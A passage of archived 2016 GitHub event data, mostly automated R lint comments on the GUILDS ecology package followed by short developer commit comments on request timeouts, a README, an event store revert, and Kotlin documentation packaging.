^\n```\n[R/ESF_function.R:35:18:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L35) *style:* **Trailing whitespace is superfluous.**\n```r\n​  if(theta < 1 || \n                 ^\n```\n[R/ESF_function.R:36:15:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​     m <= 0 || \n              ^\n```\n[R/ESF_function.R:37:12:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​     m > (1-.Machine$double.eps)) {\n          ~^~\n```\n[R/ESF_function.R:40:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L40) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/ESF_function.R:43:14:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L43) *style:* **Put spaces around all infix operators.**\n```r\n​  I <- m * (J-1) / (1 - m)\n            ~^~\n```\n[R/ESF_function.R:45:13:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L45) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/ESF_function.R:47:15:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​  factor2 <- S*log(theta)   -  (lgamma(I + J) - lgamma(I))\n             ~^~\n```\n[R/ESF_function.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L48) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ESF_function.R:53:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L53) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.ESF <- function(init_vals, abund, verbose=TRUE) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:71:10:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:71:10:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L71) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:74:3:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L74) *warning:* **local variable ‘S’ assigned but may not be used**\n```r\n​  S <- length(abund)\n  ^\n```\n[R/ESF_function.R:78:24:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​  prefactor <- lgamma(J+1) -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                      ~^~\n```\n[R/ESF_function.R:78:28:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​  prefactor <- lgamma(J+1) -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                           ^~\n```\n[R/ESF_function.R:78:29:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L78) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor <- lgamma(J+1) -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                            ^\n```\n[R/ESF_function.R:79:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L79) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/ESF_function.R:81:15:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L81) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n             ~^~~\n```\n[R/ESF_function.R:81:16:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L81) *warning:* **no visible global function definition for ‘esf_local’**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n               ^~~~~~~~~\n```\n[R/ESF_function.R:81:21:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L81) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n                   ~^~\n```\n[R/ESF_function.R:83:4:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L83) *style:* **Trailing whitespace is superfluous.**\n```r\n​  }  \n   ^~\n```\n[R/ESF_function.R:84:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L84) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ESF_function.R:85:14:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L85) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​  optimum <- simplex(init_vals, g, verbose)\n             ^~~~~~~\n```\n[R/evaluateLogLik2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateLogLik <- function(v, theta_x, theta_y, alpha_x, alpha_y,\n^~~~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:4:10:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L4) *style:* **Put spaces around all infix operators.**\n```r\n​  ny <- 1-v\n        ~^~\n```\n[R/evaluateLogLik2.R:5:27:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/evaluateLogLik2.R:6:27:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/evaluateLogLik2.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L7) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/evaluateLogLik2.R:11:6:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(cnt in seq_along(I_X)) {\n     ^\n```\n[R/evaluateLogLik2.R:17:9:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l <- ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny)\n        ^\n```\n[R/evaluateLogLik2.R:17:17:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​  l <- ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny)\n               ~^~\n```\n[R/evaluateLogLik2.R:17:39:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l <- ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny)\n                                      ^\n```\n[R/evaluateLogLik2.R:17:47:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​  l <- ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny)\n                                             ~^~\n```\n[R/evaluateLogLik2.R:19:8:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L19) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  s <- calc_sum_kda(Sx, Nx, I_X, (theta_x/2), KDA_X)\n       ^~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:19:42:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​  s <- calc_sum_kda(Sx, Nx, I_X, (theta_x/2), KDA_X)\n                                        ~^~\n```\n[R/evaluateLogLik2.R:20:8:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L20) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  z <- calc_sum_kda(Sy, Ny, I_Y, (theta_y/2), KDA_Y)\n       ^~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:20:42:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L20) *style:* **Put spaces around all infix operators.**\n```r\n​  z <- calc_sum_kda(Sy, Ny, I_Y, (theta_y/2), KDA_Y)\n                                        ~^~\n```\n[R/evaluateLogLik2.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/evaluateLogLik2.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/expected.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​prestonSort <- function(A) {\n^~~~~~~~~~~\n```\n[R/expected.R:2:19:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L2) *style:* **Commas should always have a space after.**\n```r\n​  output <- rep(0,13)\n                  ^\n```\n[R/expected.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L3) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/expected.R:4:6:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L4) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(k in 1:length(output)) {\n     ^\n```\n[R/expected.R:5:15:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​    start <- 2^(k-1)\n             ~^~\n```\n[R/expected.R:5:16:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    start <- 2^(k-1)\n               ^\n```\n[R/expected.R:5:18:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​    start <- 2^(k-1)\n                ~^~\n```\n[R/expected.R:6:18:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​    end <- -1 + 2^(k)\n                ~^~\n```\n[R/expected.R:6:19:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    end <- -1 + 2^(k)\n                  ^\n```\n[R/expected.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n^~\n```\n[R/expected.R:7:7:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(end > length(A)) {\n      ^\n```\n[R/expected.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in 1:length(M$guildX)) {\n^~\n```\n[R/expected.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanX[m] <- meanX[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in 1:length(M$guildY)) {\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n^~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanY[m] <- meanY[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in 1:length(M$guildX)) {\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanX[m] <- meanX[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in 1:length(M$guildY)) {\n^~\n```\n[R/expected.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanY[m] <- meanY[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:21:5:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(theta < 1) {\n    ^\n```\n[R/expected.R:25:5:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(m < 0) {\n    ^\n```\n[R/expected.R:29:5:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L29) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(m > 1) {\n    ^\n```\n[R/expected.R:33:5:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(J < 0) {\n    ^\n```\n[R/expected.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L37) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/expected.R:38:5:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L38) *style:* **Use <-, not =, for assignment.**\n```r\n​  I = (J-1)* m / (1-m)\n    ^\n```\n[R/expected.R:38:9:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​  I = (J-1)* m / (1-m)\n       ~^~\n```\n[R/expected.R:38:12:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​  I = (J-1)* m / (1-m)\n          ~^\n```\n[R/expected.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​  I = (J-1)* m / (1-m)\n                  ~^~\n```\n[R/expected.R:39:10:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L39) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  aux <- pm_sad(theta, I, J)\n         ^~~~~~\n```\n[R/expected.R:40:10:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L40) *style:* **Variable and function names should be all lowercase.**\n```r\n​  SAD <- prestonSort(aux)\n         ^~~~~~~~~~~\n```\n[R/expected.R:40:10:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L40) *warning:* **no visible global function definition for ‘prestonSort’**\n```r\n​  SAD <- prestonSort(aux)\n         ^~~~~~~~~~~\n```\n[R/expected.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L44) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds <- function(theta, alpha_x, alpha_y,\n^~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:46:3:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​  meanX <- rep(0, J)\n  ^~~~~\n```\n[R/expected.R:47:3:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L47) *style:* **Variable and function names should be all lowercase.**\n```r\n​  meanY <- rep(0, J)\n  ^~~~~\n```\n[R/expected.R:50:8:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L50) *warning:* **no visible global function definition for ‘draw_local’**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n       ^~~~~~~~~~\n```\n[R/expected.R:50:19:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n                 ~^~~\n```\n[R/expected.R:51:21:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L51) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in 1:length(M$guildX)) {\n                    ^\n```\n[R/expected.R:51:38:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L51) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in 1:length(M$guildX)) {\n                                     ^~~~~~\n```\n[R/expected.R:52:25:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L52) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanX[m] <- meanX[m] + M$guildX[m]\n                        ^~~~~\n```\n[R/expected.R:52:34:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanX[m] <- meanX[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:52:37:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L52) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanX[m] <- meanX[m] + M$guildX[m]\n                                    ^~~~~\n```\n[R/expected.R:52:50:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L52) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanX[m] <- meanX[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:54:21:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L54) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in 1:length(M$guildY)) {\n                    ^\n```\n[R/expected.R:54:38:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in 1:length(M$guildY)) {\n                                     ^~~~~~\n```\n[R/expected.R:55:25:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanY[m] <- meanY[m] + M$guildY[m]\n                        ^~~~~\n```\n[R/expected.R:55:34:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L55) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanY[m] <- meanY[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:55:37:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanY[m] <- meanY[m] + M$guildY[m]\n                                    ^~~~~\n```\n[R/expected.R:55:50:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanY[m] <- meanY[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:58:3:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L58) *style:* **Variable and function names should be all lowercase.**\n```r\n​  meanX <- meanX / n_replicates\n  ^~~~~\n```\n[R/expected.R:58:12:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L58) *style:* **Variable and function names should be all lowercase.**\n```r\n​  meanX <- meanX / n_replicates\n           ^~~~~\n```\n[R/expected.R:59:3:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L59) *style:* **Variable and function names should be all lowercase.**\n```r\n​  meanY <- meanY / n_replicates\n  ^~~~~\n```\n[R/expected.R:59:12:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L59) *style:* **Variable and function names should be all lowercase.**\n```r\n​  meanY <- meanY / n_replicates\n           ^~~~~\n```\n[R/expected.R:61:3:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L61) *style:* **Variable and function names should be all lowercase.**\n```r\n​  gX <- prestonSort(meanX)\n  ^~\n```\n[R/expected.R:61:9:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L61) *style:* **Variable and function names should be all lowercase.**\n```r\n​  gX <- prestonSort(meanX)\n        ^~~~~~~~~~~\n```\n[R/expected.R:61:9:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L61) *warning:* **no visible global function definition for ‘prestonSort’**\n```r\n​  gX <- prestonSort(meanX)\n        ^~~~~~~~~~~\n```\n[R/expected.R:61:21:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/expected.R#L61) *style:* **Variable and function names should be all lowercase.**\n```r\n​  gX <- prestonSort(meanX)\n                    ^~~~~\n```\n"}},"created_at":"2016-09-22T16:26:00Z"}
{"id":"4603576484","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"lpinca/shopify-token"},"payload":{"comment":{"id":19133010,"position":null,"line":null,"path":null,"commit_id":"70f3e58bd99c635610c6a20ee5c95c10bdb17bc3","created_at":"2016-09-22T16:27:25Z","updated_at":"2016-09-22T16:27:25Z","body":"Because it's slightly different. With `timed-out` the timeout expires if the socket does not connect within the given interval of time or if there is no activity on socket for more than specified amount of time. This means for example that the connection could be established just before the connection timeout expires, then a chunk of data is received just before the socket timeout expires, and so on until a timeout eventually expires and the request is aborted. For such cases the elapsed time is by far bigger than the specified timeout.\r\n\r\nWith this implementation the request is either completed within the specified amount of time or aborted, no matter what."}},"created_at":"2016-09-22T16:27:25Z"}
{"id":"4603576831","type":"CommitCommentEvent","actor":{"login":"OSMCeT"},"repo":{"name":"OSMCeT/trabson"},"payload":{"comment":{"id":19133011,"position":8,"line":7,"path":"README.md","commit_id":"da80758bfbbe086fff59c285b3fda60bbd55eff7","created_at":"2016-09-22T16:27:28Z","updated_at":"2016-09-22T16:27:28Z","body":"Alexandre Augusto\r\n"}},"created_at":"2016-09-22T16:27:28Z"}
{"id":"4603578031","type":"CommitCommentEvent","actor":{"login":"bwaidelich"},"repo":{"name":"neos/Neos.EventStore"},"payload":{"comment":{"id":19133012,"position":17,"line":74,"path":"Classes/EventSourcedRepository.php","commit_id":"297256bb950326f0f31ffe2028e51a5f599133fa","created_at":"2016-09-22T16:27:42Z","updated_at":"2016-09-22T16:27:42Z","body":"Doh, that reverted #7  ;)"}},"created_at":"2016-09-22T16:27:42Z"}
{"id":"4603580712","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19133017,"position":41,"line":0,"path":"libraries/build-docs.xml","commit_id":"12c443106c75a2e821c3978f2969edaef5c5a70c","created_at":"2016-09-22T16:28:11Z","updated_at":"2016-09-22T16:28:11Z","body":"Should we split content by modules or produce a single pile?"}},"created_at":"2016-09-22T16:28:11Z"}
{"id":"4603585917","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19133027,"position":41,"line":0,"path":"libraries/build-docs.xml","commit_id":"12c443106c75a2e821c3978f2969edaef5c5a70c","created_at":"2016-09-22T16:29:06Z","updated_at":"2016-09-22T16:29:06Z","body":"kotlin-test should be separate because it's not really part of stdlib. kotlin-reflect is currently packaged together with stdlib, and I think that's OK"}},"created_at":"2016-09-22T16:29:06Z"}
